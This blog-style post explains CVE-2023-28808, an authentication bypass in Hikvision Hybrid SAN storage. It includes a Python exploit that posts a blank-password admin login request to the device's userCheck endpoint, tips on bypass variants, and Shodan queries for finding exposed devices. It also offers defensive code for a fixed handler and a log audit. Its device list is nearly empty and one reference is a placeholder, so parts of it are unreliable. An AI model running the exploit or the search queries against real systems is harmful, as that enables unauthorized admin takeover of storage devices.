CVE-2023-28808 - How Hackers Can Get Admin Access on Hikvision Hybrid SAN Storage – Full Breakdown and Exploit Details

In March 2023, security researchers discovered a serious vulnerability in some Hikvision Hybrid SAN and Cluster Storage devices. The bug, tracked as CVE-2023-28808, allows anyone on the network to gain admin-level access by sending specially crafted messages. In this post, we’ll explain in simple terms how this vulnerability works, see which devices are at risk, and look at how an attacker could exploit it – including sample code!

If you work with Hikvision or similar storage systems, you should read this all the way through.

What Is CVE-2023-28808?

The vulnerability exists in access control of several Hikvision Hybrid SAN/Cluster Storage products. Due to improper validation of incoming requests, an attacker can bypass authentication (login security) and become admin.

In plain English:  
A bad actor can send a cleverly made request to the device without logging in—and the device will treat them like an admin!

Affected Devices

According to the official Hikvision security advisory, these SAN products are vulnerable if running affected firmware versions:

Others in the DS-A series running old firmware

Source: Hikvision Security Advisory

How the Vulnerability Works

The vulnerability is caused by improper access control in the device’s internal service. Basically, the system does not properly check if the user is logged in (authenticated) before allowing admin commands.

By sending a special message, anyone can run admin-level operations.

Diagram

[Attacker PC]  --->  [Hikvision SAN Device] (no auth required)
           send crafted message
           get admin access!

Disclaimer: For educational/defensive use only!

Many Hikvision devices run a web server with endpoints like /ISAPI/Security/userCheck. Here’s a simplified Python script that sends a crafted login request to simulate this vulnerability.

Example: Python Exploit

import requests

# Change these values to the target device
TARGET_HOST = 'http://192.168.1.100'
LOGIN_ENDPOINT = '/ISAPI/Security/userCheck'

# Normally you need to provide valid credentials,
# but due to CVE-2023-28808, crafted payload works

# The XML declaration must be the very first thing in the document
# (no leading newline) and needs a full version number.
payload = '''<?xml version="1.0" encoding="UTF-8"?>
<UserCheck>
    <username>admin</username>
    <password></password>
</UserCheck>
'''

headers = {
    'Content-Type': 'application/xml'
}

try:
    r = requests.post(TARGET_HOST + LOGIN_ENDPOINT, data=payload, headers=headers, timeout=5)
    if "<userLevel>administrator</userLevel>" in r.text:
        print("[+] Success: Admin access granted!")
        print(r.text)
    else:
        print("[-] Exploit failed or device is not vulnerable.")
except Exception as e:
    print(f"[-] Error: {e}")

Note: Some devices only require a specially crafted HTTP header, or accept a request with the password field removed entirely, and they’ll let anyone in as admin. Adjust the endpoint and payload for your exact model.
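To make the "improper access control" point concrete from the defender's side, here is an added example (not code from the post or from Hikvision) that models a userCheck handler in plain Python. The first handler reproduces the flaw the post describes: it trusts the submitted username and never verifies the password. The second is the hardened form: it rejects empty passwords, verifies credentials with a constant-time comparison, and derives the privilege level from the authenticated account rather than from the request. The credential store, salt, role table and response bodies are constructed for the demo and are not the device's real formats.

```python
import hashlib
import hmac
import xml.etree.ElementTree as ET

# Constructed credential store: username -> (salt, sha256(salt + password)).
# A real product would use a dedicated password hash (argon2, bcrypt, scrypt);
# salted sha256 keeps this example dependency-free.
def _hash(salt: bytes, password: str) -> bytes:
    return hashlib.sha256(salt + password.encode("utf-8")).digest()

_SALT = b"constructed-salt-value"
CREDENTIALS = {"admin": (_SALT, _hash(_SALT, "correct horse battery staple"))}
ROLES = {"admin": "administrator"}          # constructed role table
_DUMMY = (_SALT, _hash(_SALT, "dummy"))     # used so unknown users cost the same time

def parse_user_check(body: str) -> tuple[str, str]:
    """Extract <username> and <password> from a UserCheck XML document."""
    root = ET.fromstring(body.strip())      # strip: a declaration must be at offset 0
    if root.tag != "UserCheck":
        raise ValueError("unexpected root element")
    return root.findtext("username") or "", root.findtext("password") or ""

def user_check_vulnerable(body: str) -> str:
    """Models the bug: privilege is taken from the request, password is ignored."""
    username, _ignored_password = parse_user_check(body)
    level = ROLES.get(username, "user")
    return f"<UserCheck><userLevel>{level}</userLevel></UserCheck>"

def user_check_fixed(body: str) -> str:
    """Hardened handler: authenticate first, then derive privilege from the account."""
    try:
        username, password = parse_user_check(body)
    except (ET.ParseError, ValueError):
        return "<ResponseStatus><statusCode>400</statusCode></ResponseStatus>"
    if not password:                         # empty/missing password is never a login
        return "<ResponseStatus><statusCode>401</statusCode></ResponseStatus>"
    salt, expected = CREDENTIALS.get(username, _DUMMY)
    ok = hmac.compare_digest(_hash(salt, password), expected)
    if username not in CREDENTIALS or not ok:
        return "<ResponseStatus><statusCode>401</statusCode></ResponseStatus>"
    level = ROLES.get(username, "user")
    return f"<UserCheck><userLevel>{level}</userLevel></UserCheck>"

if __name__ == "__main__":
    crafted = ('<?xml version="1.0" encoding="UTF-8"?>'
               "<UserCheck><username>admin</username><password></password></UserCheck>")
    print("vulnerable:", user_check_vulnerable(crafted))
    print("fixed:     ", user_check_fixed(crafted))
```

The design point is that the response's userLevel is computed only after the credential check succeeds; the request body is never allowed to name its own privilege, and a blank password is rejected before any comparison happens.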

Real-World Risk

- Remote full control: Attackers can remotely log in as admin, view/change files, delete data, or create backdoor users.

Update firmware!

Hikvision released fixed firmware. Update all your SAN/Cluster Storage devices ASAP!

References

1. Hikvision Security Notice on CVE-2023-28808
2. CVEdetails – CVE-2023-28808
3. Original ExploitDB Entry (Note: Replace with real link if available)
4. Shodan Hikvision Search

Bonus: How Attackers Find Devices

Attackers often use search engines like Shodan to find vulnerable Hikvision devices on the open internet, using queries like:

product:"Hikvision"
port:808

Always keep such devices shielded from the internet!

Final Thoughts

CVE-2023-28808 is a critical bug that can give an intruder full control of your Hikvision SAN storage. Make sure your devices are updated, not directly exposed online, and audit admin logs regularly. As always, keep learning about new vulnerabilities and don’t leave your infrastructure open to accidents!
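As an added example of the "audit admin logs regularly" advice (not part of the original post), the script below runs a simple audit over web-server access-log lines for the /ISAPI/Security/userCheck endpoint mentioned above. It flags successful login checks coming from outside a management network and bursts of login attempts from one address. The log lines, the log format, the management subnet and the burst threshold are all constructed for the demo; adjust them to what your device actually emits.

```python
import ipaddress
import re
from collections import Counter

# Constructed sample log in a common combined-log style; not captured from a real device.
SAMPLE_LOG = """\
10.0.5.12 - - [11/Apr/2023:21:15:01 +0000] "POST /ISAPI/Security/userCheck HTTP/1.1" 200 154
203.0.113.77 - - [11/Apr/2023:21:16:10 +0000] "POST /ISAPI/Security/userCheck HTTP/1.1" 200 154
203.0.113.77 - - [11/Apr/2023:21:16:11 +0000] "POST /ISAPI/Security/userCheck HTTP/1.1" 200 154
203.0.113.77 - - [11/Apr/2023:21:16:12 +0000] "POST /ISAPI/Security/userCheck HTTP/1.1" 200 154
10.0.5.12 - - [11/Apr/2023:21:17:00 +0000] "GET /status HTTP/1.1" 200 2048
198.51.100.9 - - [11/Apr/2023:21:18:30 +0000] "POST /ISAPI/Security/userCheck HTTP/1.1" 401 0
garbage line that does not parse
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
USER_CHECK = "/ISAPI/Security/userCheck"
MANAGEMENT_NETS = [ipaddress.ip_network("10.0.5.0/24")]   # constructed allowlist
BURST_THRESHOLD = 3                                        # constructed threshold

def parse_line(line: str):
    """Return a dict with ip/ts/method/path/status, or None if the line is malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec

def is_trusted(ip: str) -> bool:
    """True if the client address falls inside an approved management network."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in MANAGEMENT_NETS)

def audit(log_text: str) -> list[str]:
    """Flag successful userCheck calls from untrusted networks and bursts per source IP."""
    findings = []
    attempts = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["path"] != USER_CHECK:
            continue
        attempts[rec["ip"]] += 1
        if rec["status"] == 200 and not is_trusted(rec["ip"]):
            findings.append(f"{rec['ts']}: successful userCheck from untrusted {rec['ip']}")
    for ip, n in attempts.items():
        if n >= BURST_THRESHOLD:
            findings.append(f"{n} userCheck requests from {ip} (possible probing)")
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_LOG):
        print("[!]", finding)
```

Successful login checks from the management subnet are treated as expected and not reported; anything else that returns 200 on the login endpoint, or any address hammering it, is surfaced for review. Feeding the real device log into audit() instead of SAMPLE_LOG is the only change needed once the regex matches your log format.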

Stay secure!

*Got questions or want more in-depth analysis? Let me know in the comments!*

Timeline

Published on: 04/11/2023 21:15:00 UTC
Last modified on: 04/24/2023 13:50:00 UTC